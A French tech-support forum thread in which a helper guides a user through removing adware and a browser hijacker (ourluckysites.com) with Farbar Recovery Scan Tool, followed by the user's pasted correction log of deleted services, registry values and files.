Mais pour windows-PG et WPVXAP.setting, je les trouve pas dans la recherche de fichier même en copiant collant le chemin, sa me dit que Windows ne parvient pas a trouver
ok, je fais le script et je reviens
@+
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
7 mai 2017 à 22:24
7 mai 2017 à 22:24
re
/!\Script uniquement pour cet ordinateur, à ne pas reproduire sur un autre ordinateur/!\
fait ceci:
ouvre le bloc-note
copie/colle le texte depuis ce lien:
https://www.cjoint.com/c/GEhuwq16xcl
quand le texte est copié/collé, clique sur "fichier">>"enregistrer sous" et choisi le "bureau" dans la colonne de gauche
en bas de page, dans "nom de fichier", tape fixlist.txt et clique sur "enregistrer"
exécute FRST et clique sur "corriger/fix"
quand la correction sera terminée, un fichier texte apparaîtra, copie/colle le résultat dans ta prochaine réponse
PS: dit moi comment fonctionne le pc et si tu as encore des soucis
@+
/!\Script uniquement pour cet ordinateur, à ne pas reproduire sur un autre ordinateur/!\
fait ceci:
ouvre le bloc-note
copie/colle le texte depuis ce lien:
https://www.cjoint.com/c/GEhuwq16xcl
quand le texte est copié/collé, clique sur "fichier">>"enregistrer sous" et choisi le "bureau" dans la colonne de gauche
en bas de page, dans "nom de fichier", tape fixlist.txt et clique sur "enregistrer"
exécute FRST et clique sur "corriger/fix"
quand la correction sera terminée, un fichier texte apparaîtra, copie/colle le résultat dans ta prochaine réponse
PS: dit moi comment fonctionne le pc et si tu as encore des soucis
@+
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
7 mai 2017 à 23:02
7 mai 2017 à 23:02
voila le résultat de FRST:
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 07-05-2017
Exécuté par Fabien (07-05-2017 22:47:01) Run:2
Exécuté depuis C:\Users\Fabien\Desktop
Profils chargés: Fabien (Profils disponibles: Fabien)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
(AVAST Software) C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\...\Run: [background_fault] => C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
Edge HomeButtonPage: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
FF Extension: (SimilarWeb) - C:\Users\Fabien\AppData\Roaming\Firefox\Firefox\Profiles\2mkgwlxs.default-1492445865743\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-04] [non sign�]
FF Extension: (FF Adr) - C:\Users\Fabien\AppData\Roaming\Firefox\Firefox\Profiles\2mkgwlxs.default-1492445865743\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-04] [non sign�]
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-04] () <==== ATTENTION
R2 Kitty; C:\Users\Fabien\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [Fichier non sign�] <==== ATTENTION
R2 SNARE; C:\Users\Fabien\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Fichier non sign�] <==== ATTENTION
R2 WANARE; C:\Users\Fabien\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Fichier non sign�]
R2 WinSAPSvc; C:\Users\Fabien\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [Fichier non sign�] <==== ATTENTION
2017-05-05 11:44 - 2017-05-05 11:44 - 00000000 ____D C:\Users\Fabien\AppData\Local\WANARE
2017-05-04 21:34 - 2017-05-04 21:34 - 00000000 ____D C:\Users\Fabien\AppData\Local\Zoohair
2017-05-04 21:33 - 2017-05-04 21:33 - 00000000 ____D C:\Users\Fabien\AppData\Local\Kitty
2017-05-02 14:37 - 2017-05-02 14:37 - 08553032 _____ (AVAST Software) C:\Users\Fabien\Downloads\avastclear.exe
2017-05-02 11:40 - 2017-05-05 11:46 - 00003674 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-05-02 11:40 - 2017-05-05 11:44 - 00000000 ____D C:\Users\Fabien\AppData\Roaming\WinSAPSvc
2017-05-02 11:40 - 2017-05-02 11:40 - 00000000 ____D C:\Users\Fabien\AppData\Local\SNARE
C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Zoohair\Application\chrome.exe" -- "%1" <==== ATTENTION
Task: {123BC702-66F4-4592-AF8A-D1F9FE46B0CD} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
ShortcutWithArgument: C:\Users\Fabien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
ShortcutWithArgument: C:\Users\Fabien\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
2017-05-04 21:33 - 2017-05-03 15:34 - 00323584 _____ () C:\Users\Fabien\AppData\Local\background_fault\bf.dll
FirewallRules: [{64E54A62-E65E-4D63-B5E5-22F3729015F5}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
FirewallRules: [{90BF17C4-2820-4010-9947-FA3B430B7248}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
ShortcutWithArgument: C:\Users\Fabien\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Fabien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
ShortcutWithArgument: C:\Users\Fabien\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Fichier non sign�]
R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [Fichier non sign�]
2017-05-04 21:34 - 2017-05-04 05:41 - 00105472 _____ () c:\programdata\package cache\{59399776-575d-9c54-e861-0d5eab7e707d}v10.1.14393.795\installers\iis\iisexp.dll
Hosts:
EmptyTemp:
Reboot:
Read more at https://www.cjoint.com/c/GEhuwq16xcl#rsIGgyVTGeEr5q91.99
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe => Aucun processus actif trouvé
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => valeur supprimé(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé supprimé(es) avec succès
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé supprimé(es) avec succès
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé supprimé(es) avec succès
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => valeur restauré(es) avec succès
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\\HomeButtonPage => valeur supprimé(es) avec succès
C:\Users\Fabien\AppData\Roaming\Firefox\Firefox\Profiles\2mkgwlxs.default-1492445865743\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi => déplacé(es) avec succès
C:\Users\Fabien\AppData\Roaming\Firefox\Firefox\Profiles\2mkgwlxs.default-1492445865743\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi => déplacé(es) avec succès
HKLM\System\CurrentControlSet\Services\FirefoxU => clé supprimé(es) avec succès
FirefoxU => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\Kitty => clé supprimé(es) avec succès
Kitty => service supprimé(es) avec succès
SNARE => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\SNARE => clé supprimé(es) avec succès
SNARE => service supprimé(es) avec succès
WANARE => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WANARE => clé supprimé(es) avec succès
WANARE => service supprimé(es) avec succès
WinSAPSvc => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WinSAPSvc => clé supprimé(es) avec succès
WinSAPSvc => service supprimé(es) avec succès
C:\Users\Fabien\AppData\Local\WANARE => déplacé(es) avec succès
C:\Users\Fabien\AppData\Local\Zoohair => déplacé(es) avec succès
C:\Users\Fabien\AppData\Local\Kitty => déplacé(es) avec succès
C:\Users\Fabien\Downloads\avastclear.exe => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Milimili => déplacé(es) avec succès
"C:\Users\Fabien\AppData\Roaming\WinSAPSvc" dossier déplacer:
Impossible de déplacer "C:\Users\Fabien\AppData\Roaming\WinSAPSvc" => Planifié pour déplacement au redémarrage.
C:\Users\Fabien\AppData\Local\SNARE => déplacé(es) avec succès
C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe => déplacé(es) avec succès
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee) => Erreur: Pas de correction automatique trouvée pour cet élément.
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001_Classes\ChromeHTML => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{123BC702-66F4-4592-AF8A-D1F9FE46B0CD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{123BC702-66F4-4592-AF8A-D1F9FE46B0CD} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Milimili => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => clé supprimé(es) avec succès
C:\Users\Fabien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Fabien\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Fabien\AppData\Local\background_fault\bf.dll => déplacé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64E54A62-E65E-4D63-B5E5-22F3729015F5} => valeur supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{90BF17C4-2820-4010-9947-FA3B430B7248} => valeur supprimé(es) avec succès
C:\Users\Fabien\Desktop\BigFarm.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Fabien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Fabien\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
BIT => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\BIT => clé supprimé(es) avec succès
BIT => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\IISvr => clé supprimé(es) avec succès
IISvr => service supprimé(es) avec succès
c:\programdata\package cache\{59399776-575d-9c54-e861-0d5eab7e707d}v10.1.14393.795\installers\iis\iisexp.dll => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
Read more at https://www.cjoint.com/c/GEhuwq16xcl#rsIGgyVTGeEr5q91.99 => Erreur: Pas de correction automatique trouvée pour cet élément.
=========== EmptyTemp: ==========
BITS transfer queue => 6078385 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11821490 B
Java, Flash, Steam htmlcache => 3140 B
Windows/system/drivers => 13502856 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 10812544 B
LocalService => 0 B
NetworkService => 7124 B
Fabien => 2650510 B
RecycleBin => 165844311 B
EmptyTemp: => 201 MB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 07-05-2017 22:48:49)
C:\Users\Fabien\AppData\Roaming\WinSAPSvc => a été déplacé(e) avec succès
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 07-05-2017
Exécuté par Fabien (07-05-2017 22:47:01) Run:2
Exécuté depuis C:\Users\Fabien\Desktop
Profils chargés: Fabien (Profils disponibles: Fabien)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
(AVAST Software) C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\...\Run: [background_fault] => C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
Edge HomeButtonPage: HKU\S-1-5-21-2178201453-3891589226-2901520741-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
FF Extension: (SimilarWeb) - C:\Users\Fabien\AppData\Roaming\Firefox\Firefox\Profiles\2mkgwlxs.default-1492445865743\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-04] [non sign�]
FF Extension: (FF Adr) - C:\Users\Fabien\AppData\Roaming\Firefox\Firefox\Profiles\2mkgwlxs.default-1492445865743\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-04] [non sign�]
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-04] () <==== ATTENTION
R2 Kitty; C:\Users\Fabien\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [Fichier non sign�] <==== ATTENTION
R2 SNARE; C:\Users\Fabien\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Fichier non sign�] <==== ATTENTION
R2 WANARE; C:\Users\Fabien\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Fichier non sign�]
R2 WinSAPSvc; C:\Users\Fabien\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [Fichier non sign�] <==== ATTENTION
2017-05-05 11:44 - 2017-05-05 11:44 - 00000000 ____D C:\Users\Fabien\AppData\Local\WANARE
2017-05-04 21:34 - 2017-05-04 21:34 - 00000000 ____D C:\Users\Fabien\AppData\Local\Zoohair
2017-05-04 21:33 - 2017-05-04 21:33 - 00000000 ____D C:\Users\Fabien\AppData\Local\Kitty
2017-05-02 14:37 - 2017-05-02 14:37 - 08553032 _____ (AVAST Software) C:\Users\Fabien\Downloads\avastclear.exe
2017-05-02 11:40 - 2017-05-05 11:46 - 00003674 _____ C:\WINDOWS\System32\Tasks\Milimili
